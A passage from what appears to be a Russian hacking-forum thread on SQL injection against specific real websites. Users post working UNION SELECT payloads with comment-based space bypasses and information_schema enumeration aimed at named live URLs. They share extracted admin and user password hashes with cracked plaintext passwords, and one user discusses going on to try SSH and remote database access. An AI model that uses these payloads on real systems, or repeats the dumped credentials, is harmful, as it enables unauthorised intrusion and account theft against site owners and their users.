Я тож проверял...Просто я новичек. Изучаю в данный момент пхп+мускул...Но все таки не понимаю уязвимости! Просто я тож находил эти базы, с помощбю параметра database(), но так и не понял, из какой базы из них и каким образом извлечь нужные мне логин и пароль юзеров...Да, я находил другие таблицы, да, я некоторые проверял, но ни в одной из них не было таблиц username, email, password. А возможно, что админ просто изпользовал самодельные, известные только ему, названия таблиц? То есть когда я использовал table_name, было около 50 таблиц! Админ мог использовать какое-нибуть "левое" название для нужной мне таблицы, а найденную мной сделать "фейком"??
У меня такой же вопрос как и у Tigger, если какой то способ кроме /**/ заменить пробелы, а то при чпу выходит фигня - http://lib.aldebaran.ru/author/dolgova_elena/dolgova_elena_centurion'/ ? И почему вот такой финт не проходит http://lib.aldebaran.ru/author/dolgova_elena/dolgova_elena_centurion'%2f**%2forder%2f**%2fby%2f**%2f1/ @EmIL Иногда БД test просто фейк
http://www.rfbd.ru/info.php?id=-446+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password,email),10,11,12,13,14,15,16,17,18,19,20+from+test.jos_users
1) ДБ узнается через table_schema 2) Можно искать таблицы по именам полей, т.е. ПРИМЕР: 1,2,table_name,4,5+from+information_schema.tables+where+column_name+like+'%user%'.
http://kronverkcinema.ru/repertoire/movies/watchmen'/**/union/**/select/**/1,2,3,version(),5,6,7/* смотрим свойста имега(путь к картинке) версия 5.0.21
2 Tigger http://kronverkcinema.ru/repertoire/movies/watchmen'/**/UNION/**/SELECT/**/1,2,3,(SELECT/**/CONCAT_WS(0x3a,u_login,u_password)/**/FROM/**/kronverk.0users/**/LIMIT/**/1,1),5,6,7/* [0]:0admin:cb9bfe903a233a5e3e5db91f557efa49 [1]:user1:ae1276475fe133abcc93dff6bebc9413 Пароль не найден в паблик базе, на passcracking.ru не найден
http://kronverkcinema.ru/repertoire/movies/watchmen'/**/union/**/select/**/1,2,3,concat_ws(0x3a,id,u_login,u_password),5,6,7/**/from/**/0users/* - докрутил сам уж тут) 0admin:cb9bfe903a233a5e3e5db91f557efa49:vjhrjlfd user1:ae1276475fe133abcc93dff6bebc9413:kronverk123 Вот так вот =) Но к сожелению к /admin/ доступ запрещен =( И фтп нету =( Сейчас попробую через ssh и удаленно к БД можно попробывать ЗЫ: Всем спасибо за помощь)
Ну да.. Code: http://striweb.si.edu/esp/tesp/details.php?id=1378+and+substring(version(),1,1)=3 Code: http://adena.ru/checkout.html?id=1' Не могу, решил выложить... http://adena.ru/checkout.html?id=1'+and+substring(version(),1,1)=5/*
http://www.msm-5.ru/news.phtml?sid=79&nid=57 - стр. 57 http://www.msm-5.ru/news.phtml?sid=79&nid=57/**/ - стр. 57 http://www.msm-5.ru/news.phtml?sid=79&nid=57-2 - стр. 55 Это инъекция, но кол-во не могу подобрать - дошел до 20.
2 Byrger почитай про слепые скули http://forum.antichat.ru/thread19844-blind+sql.html 2 mailbrush если я правильно тебя понял то это char http://www.webfuture.ru/igo/convert.php
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''%' or entities.description like '%1'%') and (entities.keyword Если переменная не фильтруется и включено сообщение о выводе ошибки. В моём случае возможно ченють вывести? При этом сообщение.
S0ulVortex А как по твоему по ошибке можно сказать о наличии или отсутствие вывода? Со 100% уверенностью нельзя даже сказать, есть там скуль или нет. Хотя. думаю, что есть и запрос будет примерно такой: 1') order by 1/* но это лишь предположение KPbIBe[D]Ko Мне надоело тереть твои посты. Прочти правила форума, раздела, темы, ПМ. Хоть что-нибудь прочитай. Просьбы о взломах, о поиске багов, сюда постить не надо. Здесь разбирают конкретные уязвимости УЖЕ найденные. По которым необходима какая-либо помощь
Я не уверен, но интуиция подсказывает что такая ошибка на столь значительном проекте это уже просто недочет о котором не заметили и по этому я так уверенно задал вопрос а вдруг прокатит. А вот что ещё заметил это получается в поиске при добавление кавычки ( ' ) вылетает такое сообщение. Еслиже писать любой текст или ещё че он пишет типа ничего не найдено. Заметил ещё ошибка меняется если ставить просто ( ' ) Code: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 6 А если к примеру поставить такое ( ' -- ) Ошибка такая Code: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '%' or entities.name like '%--%' or entities.description like '% А при ( ') order by 1/* ) выводит такую ошибку Code: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '')%' or entities.description like '%1')%') and (entities.keyword А если ставить ( ' ' ) то ошибка пропадает
